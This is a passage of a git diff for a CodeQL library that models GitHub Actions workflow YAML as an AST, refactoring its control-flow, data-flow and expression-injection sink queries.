AstNodeImpl getParentNode() { + exists(AstNodeImpl n | n.getAChildNode() = this and result = n) + } + + override string getAPrimaryQlClass() { result = "ScalarValueImpl" } + + override Location getLocation() { result = value.getLocation() } + + override YamlNode getNode() { result = value } +} + +class ExpressionImpl extends AstNodeImpl, TExpressionNode { + YamlNode key; + YamlString value; + string rawExpression; + string expression; + int exprOffset; + + ExpressionImpl() { + this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and + expression = + rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + override string toString() { result = expression } + + override AstNodeImpl getAChildNode() { none() } + + override AstNodeImpl getParentNode() { result.getNode() = value } + + override string getAPrimaryQlClass() { result = "ExpressionNode" } + + override YamlNode getNode() { none() } + + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { + exists(int lineDiff, string text, string style, Location loc | + text = value.getValue() and + loc = value.getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = value.getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + partialLineLengthSum(text, r - 1) < exprOffset and + partialLineLengthSum(text, r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + key.getLocation().getStartColumn() + exprOffset - partialLineLengthSum(text, r - 1) + 2 - + 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + partialLineLengthSum(text, r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = key.getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = key.getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = value.getFile().getAbsolutePath() and + this.expressionLocation(sl, sc, el, ec) + } +} + +class CompositeActionImpl extends AstNodeImpl, TCompositeAction { + YamlMapping n; + + CompositeActionImpl() { this = TCompositeAction(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = this.getInputs() or + // result = this.getOutputs() or + // result = this.getRuns() + // } + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "CompositeActionImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + RunsImpl getRuns() { result.getNode() = n.lookup("runs") } + + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = n.lookup("inputs") } + + InputImpl getAnInput() { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().getValue() = name + } +} + +class WorkflowImpl extends AstNodeImpl, TWorkflowNode { + YamlMapping n; + + WorkflowImpl() { this = TWorkflowNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = this.getAJob() or + // result = this.getStrategy() or + // result = this.getEnv() or + // result = this.getPermissions() + // } + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "WorkflowImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } + /** Gets the 'global' `env` mapping in this workflow. */ + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = n.lookup("name").(YamlString).getValue() } + + /** Gets the job within this workflow with the given job ID. */ + JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + + /** Gets a job within this workflow */ + JobImpl getAJob() { result = this.getJob(_) } + + /** Workflow is triggered by given trigger event */ + predicate hasTriggerEvent(string trigger) { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + } + + /** Gets the trigger event that starts this workflow. */ + string getATriggerEvent() { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) + } + + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this workflow. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { + YamlValue workflow_call; + + ReusableWorkflowImpl() { + n.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = super.getAChildNode() or + // result = this.getInputs() or + // result = this.getOutputs() + // } + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = workflow_call.(YamlMapping).lookup("inputs") } + + InputImpl getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) + } + + InputImpl getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class RunsImpl extends AstNodeImpl, TRunsNode { + YamlMapping n; + + RunsImpl() { this = TRunsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAStep() } + override CompositeActionImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "RunsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the action that this `runs` mapping is in. */ + CompositeActionImpl getAction() { result = this.getParentNode() } + + /** Gets any steps that are defined within this job. */ + StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } +} + +class InputsImpl extends AstNodeImpl, TInputsNode { + YamlMapping n; + + InputsImpl() { this = TInputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnInput() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + InputImpl getAnInput() { n.maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class InputImpl extends AstNodeImpl, TInputNode { + YamlValue n; + + InputImpl() { this = TInputNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override InputsImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } +} + +class OutputsImpl extends AstNodeImpl, TOutputsNode { + YamlMapping n; + + OutputsImpl() { this = TOutputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OutputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputExpr(_) } + + /** Gets a specific output expression by name. */ + ExpressionImpl getOutputExpr(string name) { + exists(YamlScalar l | + l = result.getParentNode().getNode() and + ( + n.lookup(name).(YamlMapping).lookup("value") = l or + n.lookup(name) = l + ) + ) + } + + string getAnOutputName() { n.maps(any(YamlString s | s.getValue() = result), _) } +} + +class PermissionsImpl extends AstNodeImpl, TPermissionsNode { + YamlMapping n; + + PermissionsImpl() { this = TPermissionsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "PermissionsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } +} + +class StrategyImpl extends AstNodeImpl, TStrategyNode { + YamlMapping n; + + StrategyImpl() { this = TStrategyNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override ExpressionImpl getAChildNode() { result = this.getAMatrixVarExpr() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StrategyImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets a specific matric expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string name) { + n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode() + } + + /** Gets a specific matric expression (YamlMapping) by name. */ + ExpressionImpl getAMatrixVarExpr() { + n.lookup("matrix").(YamlMapping).lookup(_) = result.getNode() + } +} + +class NeedsImpl extends AstNodeImpl, TNeedsNode { + YamlMappingLikeNode n; + + NeedsImpl() { this = TNeedsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getNode().lookup("needs") = n } + + override string getAPrimaryQlClass() { result = "NeedsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets a job that needs to be run before the job defining these needs. */ + JobImpl getANeededJob() { + result.getId() = n.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = n.getLocation().getFile() + } +} + +class JobImpl extends AstNodeImpl, TJobNode { + YamlMapping n; + string jobId; + WorkflowImpl workflow; + + JobImpl() { + this = TJobNode(n) and + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + } + + // TODO: REMOVE + override string toString() { result = "Job: " + jobId } + + //override string toString() { result = n.toString() } + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "JobImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the ID of this job, as a string. */ + string getId() { result = jobId } + + /** Gets the workflow this job belongs to. */ + WorkflowImpl getWorkflow() { result = workflow } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets a needed job. */ + JobImpl getANeededJob() { + exists(NeedsImpl needs | + needs.getParentNode() = this and + result = needs.getANeededJob() + ) + } + + /** Gets the declaration of the outputs for the job. */ + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + /** Gets a Job output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + /** Gets a Job output expression given its name. */ + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + /** Gets the condition that must be satisfied for this job to run. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the permissions for this job. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this job. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class LocalJobImpl extends JobImpl { + LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } + + /** Gets any steps that are defined within this job. */ + StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } +} + +class StepImpl extends AstNodeImpl, TStepNode { + YamlMapping n; + + StepImpl() { this = TStepNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StepImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the ID of this step, if any. */ + string getId() { result = n.lookup("id").(YamlString).getValue() } + + /** Gets the value of the `if` field in this step, if any. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } +} + +class IfImpl extends AstNodeImpl, TIfNode { + YamlValue n; + + IfImpl() { this = TIfNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "IfImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the condition that must be satisfied for this job to run. */ + string getCondition() { result = n.(YamlScalar).getValue() } +} + +class EnvImpl extends AstNodeImpl, TEnvNode { + YamlMapping n; + + EnvImpl() { this = TEnvNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { + result.(JobImpl).getEnv() = this or + result.(StepImpl).getEnv() = this or + result.(WorkflowImpl).getEnv() = this + } + + override string getAPrimaryQlClass() { result = "EnvImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { n.lookup(name) = result.getNode() } + + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { n.lookup(_) = result.getNode() } + + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { n.lookup(name) = result.getParentNode().getNode() } + + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { n.lookup(_) = result.getParentNode().getNode() } +} + +abstract class UsesImpl extends AstNodeImpl { + abstract string getCallee(); + + abstract string getVersion(); + + abstract ExpressionImpl getArgumentExpr(string key); +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + +/** A Uses step represents a call to an action that is defined in a GitHub repository. */ +class UsesStepImpl extends StepImpl, UsesImpl { + YamlScalar u; + + UsesStepImpl() { this.getNode().lookup("uses") = u } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + + /** Gets the argument expression for the given key. */ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" + } +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ +private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + +private string pathUsesParser() { result = "\\./(.+)" } + +class ExternalJobImpl extends JobImpl, UsesImpl { + YamlScalar u; + + ExternalJobImpl() { n.lookup("uses") = u } + + //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override string getCallee() { + if u.getValue().matches("./%") + then result = u.getValue().regexpCapture(pathUsesParser(), 1) + else + result = + u.getValue().regexpCapture(repoUsesParser(), 1) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 2) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 3) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(YamlString name | + n.lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) + else none() + ) + } + + /** Gets the argument expression for the given key. */ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } +} + +class RunImpl extends StepImpl { + YamlScalar script; + + RunImpl() { this.getNode().lookup("run") = script } + + string getScript() { result = script.getValue() } + + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } +} + +/** + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +abstract class ContextExpressionImpl extends ExpressionImpl { + // TODO: REMOVE + // ContextExpressionImpl() { + // expression + // .regexpMatch([ + // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + // matrixCtxRegex() + // ]) + // } + abstract string getFieldName(); + + abstract AstNodeImpl getTarget(); +} + +private string stepsCtxRegex() { + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string needsCtxRegex() { + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string jobsCtxRegex() { + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } + +private string inputsCtxRegex() { + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] +} + +/** + * Holds for an expression accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepsExpressionImpl extends ContextExpressionImpl { + string stepId; + string fieldName; + + StepsExpressionImpl() { + expression.regexpMatch(stepsCtxRegex()) and + stepId = expression.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expression.regexpCapture(stepsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + this.getLocation().getFile() = result.getLocation().getFile() and + result.(StepImpl).getId() = stepId + } +} + +/** + * Holds for an expression accesing the `needs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` + */ +class NeedsExpressionImpl extends ContextExpressionImpl { + JobImpl neededJob; + string fieldName; + + NeedsExpressionImpl() { + expression.regexpMatch(needsCtxRegex()) and + fieldName = expression.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + this.getEnclosingJob().getANeededJob() = neededJob and + ( + // regular jobs + neededJob.getOutputs() = result + or + // reusable workflow calling jobs + neededJob.(ExternalJobImpl) = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) + */ +class JobsExpressionImpl extends ContextExpressionImpl { + string jobId; + string fieldName; + + JobsExpressionImpl() { + expression.regexpMatch(jobsCtxRegex()) and + jobId = expression.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expression.regexpCapture(jobsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(JobImpl job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getOutputs() = result + ) + } +} + +/** + * Holds for an expression the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` + */ +class InputsExpressionImpl extends ContextExpressionImpl { + string fieldName; + + InputsExpressionImpl() { + expression.regexpMatch(inputsCtxRegex()) and + fieldName = expression.regexpCapture(inputsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + result.getLocation().getFile() = this.getLocation().getFile() and + ( + exists(ReusableWorkflowImpl w | w.getInput(fieldName) = result) + or + exists(CompositeActionImpl a | a.getInput(fieldName) = result) + ) + } +} + +/** + * Holds for an expression accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvExpressionImpl extends ContextExpressionImpl { + string fieldName; + + EnvExpressionImpl() { + expression.regexpMatch(envCtxRegex()) and + fieldName = expression.regexpCapture(envCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(AstNodeImpl s | + s.getInScopeEnvVarExpr(fieldName) = result and + s.getAChildNode*() = this + ) + } +} + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixExpressionImpl extends ContextExpressionImpl { + string fieldName; + + MatrixExpressionImpl() { + expression.regexpMatch(matrixCtxRegex()) and + fieldName = expression.regexpCapture(matrixCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(WorkflowImpl w | + w.getStrategy().getMatrixVarExpr(fieldName) = result and + w.getAChildNode*() = this + ) + or + exists(JobImpl j | + j.getStrategy().getMatrixVarExpr(fieldName) = result and + j.getAChildNode*() = this + ) + } +} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8cd640ace096..f3785eada37c 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -80,7 +80,7 @@ module Completion { } module CfgScope { - abstract class CfgScope extends WorkflowNode { } + abstract class CfgScope extends AstNode { } class WorkflowScope extends CfgScope instanceof Workflow { } @@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getAMatrixVar() and l = child.getLocation() + child = super.getAMatrixVarExpr() and l = child.getLocation() | child order by @@ -224,15 +224,14 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { } } -private class JobTree extends StandardPreOrderTree instanceof Job { +private class JobTree extends StandardPreOrderTree instanceof LocalJob { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | ( child = super.getAStep() or child = super.getOutputs() or - child = super.getStrategy() or - child = super.getUses() + child = super.getStrategy() ) and l = child.getLocation() | @@ -261,7 +260,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and + (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and l = child.getLocation() | child @@ -271,10 +270,10 @@ private class RunTree extends StandardPreOrderTree instanceof Run { } } -private class StringValueTree extends StandardPreOrderTree instanceof StringValue { +private class ScalarValueTree extends StandardPreOrderTree instanceof ScalarValue { override ControlFlowTree getChildNode(int i) { result = - rank[i](ExpressionNode child, Location l | + rank[i](Expression child, Location l | child = super.getAChildNode() and l = child.getLocation() | @@ -289,6 +288,6 @@ private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -private class StringValueLeaf extends LeafTree instanceof StringValue { } +private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } -private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { } +private class ExpressionLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 7cfde2a6f9ff..fddf537ed1df 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -38,7 +38,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript().getValue() and + script = r.getScript() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 65e2abaa6c64..52c2ae6a4833 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -243,7 +243,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { /** * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. * For Actions, we dont need SSA nodes since it should be already in SSA form - * Local flow steps are always between two nodes in the same Cfg scope (job definition). + * Local flow steps are always between two nodes in the same Cfg scope. */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index df5b1f70ae56..2ed2e03a34e7 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -4,6 +4,3 @@ extensions: extensible: sinkModel data: - ["actions/github-script","*","input.script","expression-injection"] - - - diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index fbdf9ca7daa4..fb31fe209902 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "argus_case_study.yml" + source.getLocation().getFile().getBaseName() = "test.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 096c19b48d04..1f90efa5bcc9 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 040251045c87..d84566dab046 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 